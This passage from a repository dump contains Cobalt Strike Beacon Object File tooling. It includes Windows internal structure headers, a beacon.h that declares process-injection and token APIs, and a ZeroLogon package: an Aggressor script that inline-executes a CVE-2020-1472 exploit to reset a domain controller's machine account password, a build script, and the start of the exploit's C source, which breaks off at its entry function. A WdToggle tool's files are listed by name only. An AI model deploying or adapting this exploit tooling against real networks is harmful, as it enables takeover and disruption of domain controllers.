PVOID EntryInProgress; 123 | BOOLEAN ShutdownInProgress; 124 | HANDLE ShutdownThreadId; 125 | } PEB_LDR_DATA, *PPEB_LDR_DATA; 126 | 127 | typedef struct _RTL_USER_PROCESS_PARAMETERS { 128 | BYTE Reserved1[16]; 129 | PVOID Reserved2[10]; 130 | UNICODE_STRING ImagePathName; 131 | UNICODE_STRING CommandLine; 132 | } RTL_USER_PROCESS_PARAMETERS, *PRTL_USER_PROCESS_PARAMETERS; 133 | 134 | typedef struct _API_SET_NAMESPACE { 135 | ULONG Version; 136 | ULONG Size; 137 | ULONG Flags; 138 | ULONG Count; 139 | ULONG EntryOffset; 140 | ULONG HashOffset; 141 | ULONG HashFactor; 142 | } API_SET_NAMESPACE, *PAPI_SET_NAMESPACE; 143 | 144 | // Partial PEB 145 | typedef struct _PEB { 146 | BOOLEAN InheritedAddressSpace; 147 | BOOLEAN ReadImageFileExecOptions; 148 | BOOLEAN BeingDebugged; 149 | union 150 | { 151 | BOOLEAN BitField; 152 | struct 153 | { 154 | BOOLEAN ImageUsesLargePages : 1; 155 | BOOLEAN IsProtectedProcess : 1; 156 | BOOLEAN IsLegacyProcess : 1; 157 | BOOLEAN IsImageDynamicallyRelocated : 1; 158 | BOOLEAN SkipPatchingUser32Forwarders : 1; 159 | BOOLEAN SpareBits : 3; 160 | }; 161 | }; 162 | HANDLE Mutant; 163 | 164 | PVOID ImageBaseAddress; 165 | PPEB_LDR_DATA Ldr; 166 | PRTL_USER_PROCESS_PARAMETERS ProcessParameters; 167 | PVOID SubSystemData; 168 | PVOID ProcessHeap; 169 | PRTL_CRITICAL_SECTION FastPebLock; 170 | PVOID IFEOKey; 171 | PSLIST_HEADER AtlThunkSListPtr; 172 | union 173 | { 174 | ULONG CrossProcessFlags; 175 | struct 176 | { 177 | ULONG ProcessInJob : 1; 178 | ULONG ProcessInitializing : 1; 179 | ULONG ProcessUsingVEH : 1; 180 | ULONG ProcessUsingVCH : 1; 181 | ULONG ProcessUsingFTH : 1; 182 | ULONG ProcessPreviouslyThrottled : 1; 183 | ULONG ProcessCurrentlyThrottled : 1; 184 | ULONG ProcessImagesHotPatched : 1; 185 | ULONG ReservedBits0 : 24; 186 | }; 187 | }; 188 | union 189 | { 190 | PVOID KernelCallbackTable; 191 | PVOID UserSharedInfoPtr; 192 | }; 193 | ULONG SystemReserved; 194 | ULONG AtlThunkSListPtr32; 195 | PAPI_SET_NAMESPACE ApiSetMap; 196 | ULONG TlsExpansionCounter; 197 | PVOID TlsBitmap; 198 | ULONG TlsBitmapBits[2]; 199 | PVOID ReadOnlySharedMemoryBase; 200 | PVOID SharedData; 201 | PVOID *ReadOnlyStaticServerData; 202 | PVOID AnsiCodePageData; 203 | PVOID OemCodePageData; 204 | PVOID UnicodeCaseTableData; 205 | ULONG NumberOfProcessors; 206 | ULONG NtGlobalFlag; 207 | ULARGE_INTEGER CriticalSectionTimeout; 208 | SIZE_T HeapSegmentReserve; 209 | SIZE_T HeapSegmentCommit; 210 | SIZE_T HeapDeCommitTotalFreeThreshold; 211 | SIZE_T HeapDeCommitFreeBlockThreshold; 212 | ULONG NumberOfHeaps; 213 | ULONG MaximumNumberOfHeaps; 214 | PVOID *ProcessHeaps; 215 | PVOID GdiSharedHandleTable; 216 | PVOID ProcessStarterHelper; 217 | ULONG GdiDCAttributeList; 218 | PRTL_CRITICAL_SECTION LoaderLock; 219 | ULONG OSMajorVersion; 220 | ULONG OSMinorVersion; 221 | USHORT OSBuildNumber; 222 | } PEB, *PPEB; 223 | 224 | typedef struct _TEB { 225 | NT_TIB NtTib; 226 | PVOID EnvironmentPointer; 227 | CLIENT_ID ClientId; 228 | PVOID ActiveRpcHandle; 229 | PVOID ThreadLocalStoragePointer; 230 | PPEB ProcessEnvironmentBlock; 231 | ULONG LastErrorValue; 232 | ULONG CountOfOwnedCriticalSections; 233 | PVOID CsrClientThread; 234 | PVOID Win32ThreadInfo; 235 | ULONG User32Reserved[26]; 236 | ULONG UserReserved[5]; 237 | PVOID WOW32Reserved; 238 | ULONG CurrentLocale; 239 | ULONG FpSoftwareStatusRegister; 240 | } TEB, *PTEB; 241 | 242 | typedef struct _KEY_VALUE_FULL_INFORMATION { 243 | ULONG TitleIndex; 244 | ULONG Type; 245 | ULONG DataOffset; 246 | ULONG DataLength; 247 | ULONG NameLength; 248 | WCHAR Name[1]; 249 | } KEY_VALUE_FULL_INFORMATION, *PKEY_VALUE_FULL_INFORMATION; 250 | 251 | typedef void (WINAPI* _RtlInitUnicodeString)( 252 | PUNICODE_STRING DestinationString, 253 | PCWSTR SourceString 254 | ); 255 | 256 | typedef BOOLEAN(NTAPI *_RtlEqualUnicodeString)( 257 | PUNICODE_STRING String1, 258 | PCUNICODE_STRING String2, 259 | BOOLEAN CaseInSensitive 260 | ); 261 | 262 | typedef PULONG(NTAPI *_RtlSubAuthoritySid)( 263 | PSID Sid, 264 | ULONG SubAuthority 265 | ); 266 | 267 | typedef PUCHAR(NTAPI *_RtlSubAuthorityCountSid)( 268 | _In_ PSID Sid 269 | ); 270 | -------------------------------------------------------------------------------- /github/WdToggle/WdToggle.o: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/XTeam-Wing/WingKit/e69e554b6e04b80bb57dd882be1622432f1fd057/github/WdToggle/WdToggle.o -------------------------------------------------------------------------------- /github/WdToggle/WdToggle.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/XTeam-Wing/WingKit/e69e554b6e04b80bb57dd882be1622432f1fd057/github/WdToggle/WdToggle.png -------------------------------------------------------------------------------- /github/WdToggle/beacon.h: -------------------------------------------------------------------------------- 1 | /* 2 | * Beacon Object Files (BOF) 3 | * ------------------------- 4 | * A Beacon Object File is a light-weight post exploitation tool that runs 5 | * with Beacon's inline-execute command. 6 | * 7 | * Cobalt Strike 4.1. 8 | */ 9 | 10 | /* data API */ 11 | typedef struct { 12 | char * original; /* the original buffer [so we can free it] */ 13 | char * buffer; /* current pointer into our buffer */ 14 | int length; /* remaining length of data */ 15 | int size; /* total size of this buffer */ 16 | } datap; 17 | 18 | DECLSPEC_IMPORT void BeaconDataParse(datap * parser, char * buffer, int size); 19 | DECLSPEC_IMPORT int BeaconDataInt(datap * parser); 20 | DECLSPEC_IMPORT short BeaconDataShort(datap * parser); 21 | DECLSPEC_IMPORT int BeaconDataLength(datap * parser); 22 | DECLSPEC_IMPORT char * BeaconDataExtract(datap * parser, int * size); 23 | 24 | /* format API */ 25 | typedef struct { 26 | char * original; /* the original buffer [so we can free it] */ 27 | char * buffer; /* current pointer into our buffer */ 28 | int length; /* remaining length of data */ 29 | int size; /* total size of this buffer */ 30 | } formatp; 31 | 32 | DECLSPEC_IMPORT void BeaconFormatAlloc(formatp * format, int maxsz); 33 | DECLSPEC_IMPORT void BeaconFormatReset(formatp * format); 34 | DECLSPEC_IMPORT void BeaconFormatFree(formatp * format); 35 | DECLSPEC_IMPORT void BeaconFormatAppend(formatp * format, char * text, int len); 36 | DECLSPEC_IMPORT void BeaconFormatPrintf(formatp * format, char * fmt, ...); 37 | DECLSPEC_IMPORT char * BeaconFormatToString(formatp * format, int * size); 38 | DECLSPEC_IMPORT void BeaconFormatInt(formatp * format, int value); 39 | 40 | /* Output Functions */ 41 | #define CALLBACK_OUTPUT 0x0 42 | #define CALLBACK_OUTPUT_OEM 0x1e 43 | #define CALLBACK_ERROR 0x0d 44 | #define CALLBACK_OUTPUT_UTF8 0x20 45 | 46 | DECLSPEC_IMPORT void BeaconPrintf(int type, char * fmt, ...); 47 | DECLSPEC_IMPORT void BeaconOutput(int type, char * data, int len); 48 | 49 | /* Token Functions */ 50 | DECLSPEC_IMPORT BOOL BeaconUseToken(HANDLE token); 51 | DECLSPEC_IMPORT void BeaconRevertToken(); 52 | DECLSPEC_IMPORT BOOL BeaconIsAdmin(); 53 | 54 | /* Spawn+Inject Functions */ 55 | DECLSPEC_IMPORT void BeaconGetSpawnTo(BOOL x86, char * buffer, int length); 56 | DECLSPEC_IMPORT void BeaconInjectProcess(HANDLE hProc, int pid, char * payload, int p_len, int p_offset, char * arg, int a_len); 57 | DECLSPEC_IMPORT void BeaconInjectTemporaryProcess(PROCESS_INFORMATION * pInfo, char * payload, int p_len, int p_offset, char * arg, int a_len); 58 | DECLSPEC_IMPORT void BeaconCleanupProcess(PROCESS_INFORMATION * pInfo); 59 | 60 | /* Utility Functions */ 61 | DECLSPEC_IMPORT BOOL toWideChar(char * src, wchar_t * dst, int max); 62 | -------------------------------------------------------------------------------- /github/ZeroLogon-BOF/LICENSE: -------------------------------------------------------------------------------- 1 | BSD 3-Clause License 2 | 3 | Copyright (c) 2020, Raphael Mudge 4 | All rights reserved. 5 | 6 | Redistribution and use in source and binary forms, with or without 7 | modification, are permitted provided that the following conditions are met: 8 | 9 | 1. Redistributions of source code must retain the above copyright notice, this 10 | list of conditions and the following disclaimer. 11 | 12 | 2. Redistributions in binary form must reproduce the above copyright notice, 13 | this list of conditions and the following disclaimer in the documentation 14 | and/or other materials provided with the distribution. 15 | 16 | 3. Neither the name of the copyright holder nor the names of its 17 | contributors may be used to endorse or promote products derived from 18 | this software without specific prior written permission. 19 | 20 | THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" 21 | AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE 22 | IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE 23 | DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE 24 | FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL 25 | DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR 26 | SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER 27 | CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, 28 | OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE 29 | OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE. 30 | -------------------------------------------------------------------------------- /github/ZeroLogon-BOF/dist/zerologon.cna: -------------------------------------------------------------------------------- 1 | alias zerologon { 2 | local('$bid $barch $fqdn $netbios $args $safew'); 3 | ($bid, $safew, $fqdn) = @_; 4 | $netbios = split("\\.", $fqdn)[0]; 5 | 6 | # figure out the arch of this session 7 | $barch = barch($1); 8 | 9 | # read in the right BOF file 10 | $handle = openf(script_resource("zerologon. $+ $barch $+ .o")); 11 | $data = readb($handle, -1); 12 | closef($handle); 13 | 14 | # build our arguments 15 | $args = bof_pack($1, "ZZZ", $fqdn, $netbios, $netbios . '$'); 16 | 17 | # safety check. 18 | if ($safew ne "iunderstand") { 19 | berror($1, "zerologon aborted! Type help zerologon and read first."); 20 | return; 21 | } 22 | 23 | # announce what we're doing 24 | btask($1, "Reset $netbios $+ \$ machine account via CVE-2020-1472"); 25 | 26 | # execute it. 27 | beacon_inline_execute($1, $data, "go", $args); 28 | } 29 | 30 | beacon_command_register( 31 | "zerologon", 32 | "Reset DC machine account password with CVE-2020-1472", 33 | "Synopsis: zerologon [safeword] [DC.fqdn]\n\nReset the machine account password for a domain controller with the\nZerologon exploit. \n\nThis exploit will break the functionality of this domain controller.\n\c4Don't use in production.\o Use \c0iunderstand\o as the safe word parameter\nto acknowledge that you read this."); 34 | -------------------------------------------------------------------------------- /github/ZeroLogon-BOF/dist/zerologon.x64.o: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/XTeam-Wing/WingKit/e69e554b6e04b80bb57dd882be1622432f1fd057/github/ZeroLogon-BOF/dist/zerologon.x64.o -------------------------------------------------------------------------------- /github/ZeroLogon-BOF/dist/zerologon.x86.o: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/XTeam-Wing/WingKit/e69e554b6e04b80bb57dd882be1622432f1fd057/github/ZeroLogon-BOF/dist/zerologon.x86.o -------------------------------------------------------------------------------- /github/ZeroLogon-BOF/make.bat: -------------------------------------------------------------------------------- 1 | @echo off 2 | set PLAT="x86" 3 | IF "%Platform%"=="x64" set PLAT="x64" 4 | 5 | cl.exe /GS- /c src/zerologon.c /Fodist/zerologon.%PLAT%.o 6 | -------------------------------------------------------------------------------- /github/ZeroLogon-BOF/src/beacon.h: -------------------------------------------------------------------------------- 1 | /* 2 | * Beacon Object Files (BOF) 3 | * ------------------------- 4 | * A Beacon Object File is a light-weight post exploitation tool that runs 5 | * with Beacon's inline-execute command. 6 | */ 7 | 8 | /* data API */ 9 | typedef struct { 10 | char * original; /* the original buffer [so we can free it] */ 11 | char * buffer; /* current pointer into our buffer */ 12 | int length; /* remaining length of data */ 13 | int size; /* total size of this buffer */ 14 | } datap; 15 | 16 | DECLSPEC_IMPORT void BeaconDataParse(datap * parser, char * buffer, int size); 17 | DECLSPEC_IMPORT char * BeaconDataPtr(datap * parser, int size); 18 | DECLSPEC_IMPORT int BeaconDataInt(datap * parser); 19 | DECLSPEC_IMPORT short BeaconDataShort(datap * parser); 20 | DECLSPEC_IMPORT int BeaconDataLength(datap * parser); 21 | DECLSPEC_IMPORT char * BeaconDataExtract(datap * parser, int * size); 22 | 23 | /* format API */ 24 | typedef struct { 25 | char * original; /* the original buffer [so we can free it] */ 26 | char * buffer; /* current pointer into our buffer */ 27 | int length; /* remaining length of data */ 28 | int size; /* total size of this buffer */ 29 | } formatp; 30 | 31 | DECLSPEC_IMPORT void BeaconFormatAlloc(formatp * format, int maxsz); 32 | DECLSPEC_IMPORT void BeaconFormatReset(formatp * format); 33 | DECLSPEC_IMPORT void BeaconFormatFree(formatp * format); 34 | DECLSPEC_IMPORT void BeaconFormatAppend(formatp * format, char * text, int len); 35 | DECLSPEC_IMPORT void BeaconFormatPrintf(formatp * format, char * fmt, ...); 36 | DECLSPEC_IMPORT char * BeaconFormatToString(formatp * format, int * size); 37 | DECLSPEC_IMPORT void BeaconFormatInt(formatp * format, int value); 38 | 39 | /* Output Functions */ 40 | #define CALLBACK_OUTPUT 0x0 41 | #define CALLBACK_PENDING 0x16 42 | #define CALLBACK_OUTPUT_OEM 0x1e 43 | #define CALLBACK_ERROR 0x0d 44 | #define CALLBACK_OUTPUT_UTF8 0x20 45 | 46 | DECLSPEC_IMPORT void BeaconPrintf(int type, char * fmt, ...); 47 | DECLSPEC_IMPORT void BeaconOutput(int type, char * data, int len); 48 | DECLSPEC_IMPORT void BeaconErrorD(int msg, int arg); 49 | DECLSPEC_IMPORT void BeaconErrorDD(int msg, int arg, int arg2); 50 | DECLSPEC_IMPORT void BeaconErrorNA(int msg); 51 | DECLSPEC_IMPORT void BeaconDebug(char * fmt, ...); 52 | 53 | /* Token Functions */ 54 | DECLSPEC_IMPORT BOOL BeaconUseToken(HANDLE token); 55 | DECLSPEC_IMPORT void BeaconRevertToken(); 56 | DECLSPEC_IMPORT BOOL BeaconIsAdmin(); 57 | 58 | /* Spawn+Inject Functions */ 59 | DECLSPEC_IMPORT void BeaconGetSpawnTo(BOOL x86, char * buffer, int length); 60 | DECLSPEC_IMPORT void BeaconInjectTemporaryProcess(PROCESS_INFORMATION * pInfo, char * payload, int p_len, int p_offset, char * arg, int a_len); 61 | DECLSPEC_IMPORT void BeaconCleanupProcess(PROCESS_INFORMATION * pInfo); 62 | 63 | /* Utility Functions */ 64 | DECLSPEC_IMPORT BOOL toWideChar(char * src, wchar_t * dst, int max); 65 | 66 | /* Spawn and Inject */ 67 | //DECLSPEC_IMPORT void BeaconSpawnJob(int type, int wait, int offset, char * payload, int payload_length, char * argument, int argument_length, char * description, int description_length, BOOL x86, BOOL ignoreToken); 68 | //DECLSPEC_IMPORT void BeaconInject(HANDLE handle, char * shellcode, int shellcode_length, int shellcode_offset, char * arguments, int argument_length); 69 | 70 | /* Execute Programs */ 71 | //DECLSPEC_IMPORT BOOL BeaconExecute(char * command, int commandlength, STARTUPINFO * si, PROCESS_INFORMATION * pi, DWORD flags, BOOL ignoreToken); 72 | //DECLSPEC_IMPORT void BeaconExecuteCleanup(PROCESS_INFORMATION * pi); 73 | 74 | /* Job related APIs */ 75 | //DECLSPEC_IMPORT void BeaconWatchHandle(HANDLE readme, DWORD pid, DWORD type, char * description); 76 | //DECLSPEC_IMPORT void BeaconWatchPipe(char * pipe, DWORD pid, DWORD type, char * description); 77 | 78 | /* Win32 APIs */ 79 | DECLSPEC_IMPORT BOOL WINAPI ADVAPI32$AllocateAndInitializeSid(PSID_IDENTIFIER_AUTHORITY pIdentifierAuthority, BYTE nSubAuthorityCount, DWORD nSubAuthority0, DWORD nSubAuthority1, DWORD nSubAuthority2, DWORD nSubAuthority3, DWORD nSubAuthority4, DWORD nSubAuthority5, DWORD nSubAuthority6, DWORD nSubAuthority7, PSID *pSid); 80 | DECLSPEC_IMPORT BOOL APIENTRY ADVAPI32$CheckTokenMembership(HANDLE hToken, PSID pSid, PBOOL isMember); 81 | DECLSPEC_IMPORT BOOL WINAPI ADVAPI32$CloseServiceHandle(SC_HANDLE hSCObject); 82 | DECLSPEC_IMPORT BOOL WINAPI ADVAPI32$CreateProcessWithLogonW(LPCWSTR, LPCWSTR, LPCWSTR, DWORD, LPCWSTR, LPWSTR, DWORD, LPVOID, LPCWSTR, LPSTARTUPINFOW, LPPROCESS_INFORMATION); 83 | DECLSPEC_IMPORT BOOL APIENTRY ADVAPI32$CreateRestrictedToken(HANDLE, DWORD, DWORD, PSID_AND_ATTRIBUTES, DWORD, PLUID_AND_ATTRIBUTES, DWORD, PSID_AND_ATTRIBUTES, PHANDLE); 84 | DECLSPEC_IMPORT SC_HANDLE WINAPI ADVAPI32$CreateServiceA(SC_HANDLE hSCManager, LPCSTR lpServiceName, LPCSTR lpDisplayName, DWORD dwDesiredAccess, DWORD dwServiceType, DWORD dwStartType, DWORD dwErrorControl, LPCSTR lpBinaryPathName, LPCSTR lpLoadOrderGroup, LPDWORD lpdwTagId, LPCSTR lpDependencies, LPCSTR lpServiceStartName, LPCSTR lpPassword); 85 | DECLSPEC_IMPORT BOOL WINAPI ADVAPI32$DeleteService(SC_HANDLE hService); 86 | DECLSPEC_IMPORT BOOL WINAPI ADVAPI32$DuplicateTokenEx(HANDLE, DWORD, LPSECURITY_ATTRIBUTES, SECURITY_IMPERSONATION_LEVEL, TOKEN_TYPE, PHANDLE); 87 | DECLSPEC_IMPORT PVOID WINAPI ADVAPI32$FreeSid(PSID pSid); 88 | DECLSPEC_IMPORT BOOL WINAPI ADVAPI32$GetTokenInformation(HANDLE, TOKEN_INFORMATION_CLASS, LPVOID, DWORD, PDWORD); 89 | DECLSPEC_IMPORT PDWORD WINAPI ADVAPI32$GetSidSubAuthority(PSID, DWORD); 90 | DECLSPEC_IMPORT PUCHAR WINAPI ADVAPI32$GetSidSubAuthorityCount(PSID); 91 | DECLSPEC_IMPORT BOOL WINAPI ADVAPI32$ImpersonateLoggedOnUser(HANDLE); 92 | DECLSPEC_IMPORT BOOL WINAPI ADVAPI32$LookupAccountSidA(LPCSTR, PSID, LPSTR, LPDWORD, LPSTR, LPDWORD, PSID_NAME_USE); 93 | DECLSPEC_IMPORT BOOL WINAPI ADVAPI32$OpenProcessToken(HANDLE, DWORD, PHANDLE); 94 | DECLSPEC_IMPORT SC_HANDLE WINAPI ADVAPI32$OpenSCManagerA(LPCSTR lpMachineName, LPCSTR lpDatabaseName, DWORD dwDesiredAccess); 95 | DECLSPEC_IMPORT BOOL WINAPI ADVAPI32$QueryServiceStatus(SC_HANDLE hService, LPSERVICE_STATUS lpServiceStatus); 96 | DECLSPEC_IMPORT LSTATUS APIENTRY ADVAPI32$RegEnumKeyA(HKEY hKey, DWORD dwIndex, LPSTR lpName, DWORD cchName); 97 | DECLSPEC_IMPORT LSTATUS APIENTRY ADVAPI32$RegEnumValueA(HKEY hKey, DWORD dwIndex, LPSTR lpValueName, LPDWORD lpcchValueName, LPDWORD lpReserved, LPDWORD lpType, LPBYTE lpData, LPDWORD lpcbData); 98 | DECLSPEC_IMPORT LSTATUS APIENTRY ADVAPI32$RegOpenCurrentUser(REGSAM samDesired, PHKEY phkResult); 99 | DECLSPEC_IMPORT LSTATUS APIENTRY ADVAPI32$RegOpenKeyExA(HKEY, LPCSTR, DWORD, REGSAM, PHKEY); 100 | DECLSPEC_IMPORT LSTATUS APIENTRY ADVAPI32$RegQueryValueExA(HKEY, LPCSTR, LPDWORD, LPDWORD, LPBYTE, LPDWORD); 101 | DECLSPEC_IMPORT LSTATUS APIENTRY ADVAPI32$RegCloseKey(HKEY); 102 | DECLSPEC_IMPORT BOOL WINAPI ADVAPI32$RevertToSelf(); 103 | DECLSPEC_IMPORT BOOL WINAPI ADVAPI32$SetTokenInformation(HANDLE, TOKEN_INFORMATION_CLASS, LPVOID, DWORD); 104 | DECLSPEC_IMPORT BOOL WINAPI ADVAPI32$StartServiceA(SC_HANDLE hService, DWORD dwNumServiceArgs, LPCSTR *lpServiceArgVectors); 105 | 106 | DECLSPEC_IMPORT BOOL WINAPI KERNEL32$CloseHandle(HANDLE); 107 | DECLSPEC_IMPORT HANDLE WINAPI KERNEL32$CreateFileA(LPCSTR lpFileName, DWORD dwDesiredAccess, DWORD dwShareMode, LPSECURITY_ATTRIBUTES lpSecurityAttributes, DWORD dwCreationDisposition, DWORD dwFlagsAndAttributes, HANDLE hTemplateFile); 108 | DECLSPEC_IMPORT HANDLE WINAPI KERNEL32$CreateRemoteThread(HANDLE hProcess, LPSECURITY_ATTRIBUTES lpThreadAttributes, SIZE_T dwStackSize, LPTHREAD_START_ROUTINE lpStartAddress, LPVOID lpParameter, DWORD dwCreationFlags, LPDWORD lpThreadId); 109 | DECLSPEC_IMPORT HANDLE WINAPI KERNEL32$CreateToolhelp32Snapshot(DWORD, DWORD); 110 | DECLSPEC_IMPORT BOOL WINAPI KERNEL32$DuplicateHandle(HANDLE, HANDLE, HANDLE, LPHANDLE, DWORD, BOOL, DWORD); 111 | DECLSPEC_IMPORT DWORD WINAPI KERNEL32$GetCurrentDirectoryW(DWORD, LPWSTR); 112 | DECLSPEC_IMPORT BOOL WINAPI KERNEL32$GetFileTime(HANDLE hFile, LPFILETIME lpCreationTime, LPFILETIME lpLastAccessTime, LPFILETIME lpLastWriteTime); 113 | DECLSPEC_IMPORT DWORD WINAPI KERNEL32$GetModuleFileNameA(HMODULE, LPSTR, DWORD); 114 | DECLSPEC_IMPORT HANDLE WINAPI KERNEL32$GetCurrentProcess(); 115 | DECLSPEC_IMPORT DWORD WINAPI KERNEL32$GetCurrentProcessId(); 116 | DECLSPEC_IMPORT UINT WINAPI KERNEL32$GetSystemWindowsDirectoryA(LPSTR, UINT); 117 | DECLSPEC_IMPORT DWORD WINAPI KERNEL32$GetLastError(); 118 | DECLSPEC_IMPORT DWORD WINAPI KERNEL32$GetProcessId(HANDLE); 119 | DECLSPEC_IMPORT DWORD WINAPI KERNEL32$GetTickCount(); 120 | DECLSPEC_IMPORT HLOCAL WINAPI KERNEL32$LocalAlloc(UINT, SIZE_T); 121 | DECLSPEC_IMPORT HLOCAL WINAPI KERNEL32$LocalFree(HLOCAL); 122 | DECLSPEC_IMPORT HANDLE WINAPI KERNEL32$OpenProcess(DWORD, BOOL, DWORD); 123 | DECLSPEC_IMPORT BOOL WINAPI KERNEL32$Process32First(HANDLE, void *); 124 | DECLSPEC_IMPORT BOOL WINAPI KERNEL32$Process32Next(HANDLE, void *); 125 | DECLSPEC_IMPORT BOOL WINAPI KERNEL32$ProcessIdToSessionId(DWORD, DWORD *); 126 | DECLSPEC_IMPORT BOOL WINAPI KERNEL32$ReadProcessMemory(HANDLE hProcess, LPCVOID lpBaseAddress, LPVOID lpBuffer, SIZE_T nSize, SIZE_T * lpNumberOfBytesRead); 127 | DECLSPEC_IMPORT BOOL WINAPI KERNEL32$SetFileTime(HANDLE hFile, CONST FILETIME *lpCreationTime, CONST FILETIME *lpLastAccessTime, CONST FILETIME *lpLastWriteTime); 128 | DECLSPEC_IMPORT VOID WINAPI KERNEL32$Sleep(DWORD); 129 | DECLSPEC_IMPORT BOOL WINAPI KERNEL32$TerminateProcess(HANDLE, UINT); 130 | DECLSPEC_IMPORT LPVOID WINAPI KERNEL32$VirtualAllocEx(HANDLE hProcess, LPVOID lpAddress, SIZE_T dwSize, DWORD flAllocationType, DWORD flProtect); 131 | DECLSPEC_IMPORT DWORD WINAPI KERNEL32$WaitForSingleObject(HANDLE, DWORD); 132 | DECLSPEC_IMPORT BOOL WINAPI KERNEL32$WriteProcessMemory(HANDLE hProcess, LPVOID lpBaseAddress, LPCVOID lpBuffer, SIZE_T nSize, SIZE_T * lpNumberOfBytesWritten); 133 | 134 | DECLSPEC_IMPORT DWORD WINAPI NETAPI32$DsGetDcNameA(LPVOID, LPVOID, LPVOID, LPVOID, ULONG, LPVOID); 135 | DECLSPEC_IMPORT DWORD WINAPI NETAPI32$NetApiBufferFree(LPVOID); 136 | 137 | typedef enum _OBJECT_INFORMATION_CLASS { 138 | ObjectBasicInformation, ObjectNameInformation, ObjectTypeInformation, ObjectAllTypesInformation, ObjectHandleInformation 139 | } OBJECT_INFORMATION_CLASS; 140 | 141 | DECLSPEC_IMPORT NTSTATUS NTAPI NTDLL$NtDuplicateObject(HANDLE, HANDLE *, HANDLE, HANDLE *, ACCESS_MASK, BOOLEAN, ULONG); 142 | DECLSPEC_IMPORT NTSTATUS NTAPI NTDLL$NtQueryObject(HANDLE, OBJECT_INFORMATION_CLASS, PVOID, ULONG, PULONG); 143 | DECLSPEC_IMPORT NTSTATUS NTAPI NTDLL$NtQuerySystemInformation(SYSTEM_INFORMATION_CLASS, PVOID, ULONG, PULONG); 144 | DECLSPEC_IMPORT NTSTATUS WINAPI NTDLL$RtlAdjustPrivilege(ULONG Privilege, BOOL Enable, BOOL CurrentThread, PULONG pPreviousState); 145 | DECLSPEC_IMPORT BOOLEAN NTAPI NTDLL$RtlEqualUnicodeString(void *, void *, BOOLEAN); 146 | DECLSPEC_IMPORT VOID NTAPI NTDLL$RtlInitUnicodeString(PUNICODE_STRING, PCWSTR); 147 | 148 | DECLSPEC_IMPORT HRESULT WINAPI OLE32$CLSIDFromString(wchar_t * lpsz, LPCLSID pclsid); 149 | DECLSPEC_IMPORT HRESULT WINAPI OLE32$CoGetObject(wchar_t *, BIND_OPTS *, REFIID, void **ppv); 150 | DECLSPEC_IMPORT HRESULT WINAPI OLE32$CoInitializeEx(LPVOID, DWORD); 151 | DECLSPEC_IMPORT HRESULT WINAPI OLE32$IIDFromString(wchar_t * lpsz, LPIID lpiid); 152 | 153 | DECLSPEC_IMPORT NTSTATUS NTAPI SECUR32$LsaCallAuthenticationPackage(HANDLE, ULONG, PVOID, ULONG, PVOID, PULONG, PNTSTATUS); 154 | DECLSPEC_IMPORT NTSTATUS NTAPI SECUR32$LsaConnectUntrusted(PHANDLE); 155 | DECLSPEC_IMPORT NTSTATUS NTAPI SECUR32$LsaDeregisterLogonProcess(HANDLE); 156 | DECLSPEC_IMPORT NTSTATUS NTAPI SECUR32$LsaLookupAuthenticationPackage(HANDLE, void *, PULONG); 157 | 158 | DECLSPEC_IMPORT BOOL WINAPI SHELL32$ShellExecuteExA(LPSHELLEXECUTEINFOA); 159 | -------------------------------------------------------------------------------- /github/ZeroLogon-BOF/src/zerologon.c: -------------------------------------------------------------------------------- 1 | /* 2 | * Port of SharpZeroLogon to a Beacon Object File 3 | * https://github.com/nccgroup/nccfsas/tree/main/Tools/SharpZeroLogon 4 | */ 5 | 6 | #include 7 | #include 8 | #include 9 | #include "beacon.h" 10 | 11 | typedef struct _NETLOGON_CREDENTIAL { 12 | CHAR data[8]; 13 | } NETLOGON_CREDENTIAL, *PNETLOGON_CREDENTIAL; 14 | 15 | typedef struct _NETLOGON_AUTHENTICATOR { 16 | NETLOGON_CREDENTIAL Credential; 17 | DWORD Timestamp; 18 | } NETLOGON_AUTHENTICATOR, *PNETLOGON_AUTHENTICATOR; 19 | 20 | typedef enum _NETLOGON_SECURE_CHANNEL_TYPE{ 21 | NullSecureChannel = 0, 22 | MsvApSecureChannel = 1, 23 | WorkstationSecureChannel = 2, 24 | TrustedDnsDomainSecureChannel = 3, 25 | TrustedDomainSecureChannel = 4, 26 | UasServerSecureChannel = 5, 27 | ServerSecureChannel = 6, 28 | CdcServerSecureChannel = 7 29 | } NETLOGON_SECURE_CHANNEL_TYPE; 30 | 31 | typedef struct _NL_TRUST_PASSWORD { 32 | WCHAR Buffer[256]; 33 | ULONG Length; 34 | } NL_TRUST_PASSWORD, *PNL_TRUST_PASSWORD; 35 | 36 | DECLSPEC_IMPORT NTSTATUS NETAPI32$I_NetServerReqChallenge(LPWSTR PrimaryName, LPWSTR ComputerName, PNETLOGON_CREDENTIAL ClientChallenge, PNETLOGON_CREDENTIAL ServerChallenge); 37 | DECLSPEC_IMPORT NTSTATUS NETAPI32$I_NetServerAuthenticate2(LPWSTR PrimaryName, LPWSTR AccountName, NETLOGON_SECURE_CHANNEL_TYPE AccountType, LPWSTR ComputerName, PNETLOGON_CREDENTIAL ClientCredential, PNETLOGON_CREDENTIAL ServerCredential, PULONG NegotiatedFlags); 38 | DECLSPEC_IMPORT NTSTATUS NETAPI32$I_NetServerPasswordSet2(LPWSTR PrimaryName, LPWSTR AccountName, NETLOGON_SECURE_CHANNEL_TYPE AccountType, LPWSTR ComputerName, PNETLOGON_AUTHENTICATOR Authenticator, PNETLOGON_AUTHENTICATOR ReturnAuthenticator, PNL_TRUST_PASSWORD ClearNewPassword); 39 | 40 | void go(char * args, int alen) { 41 | 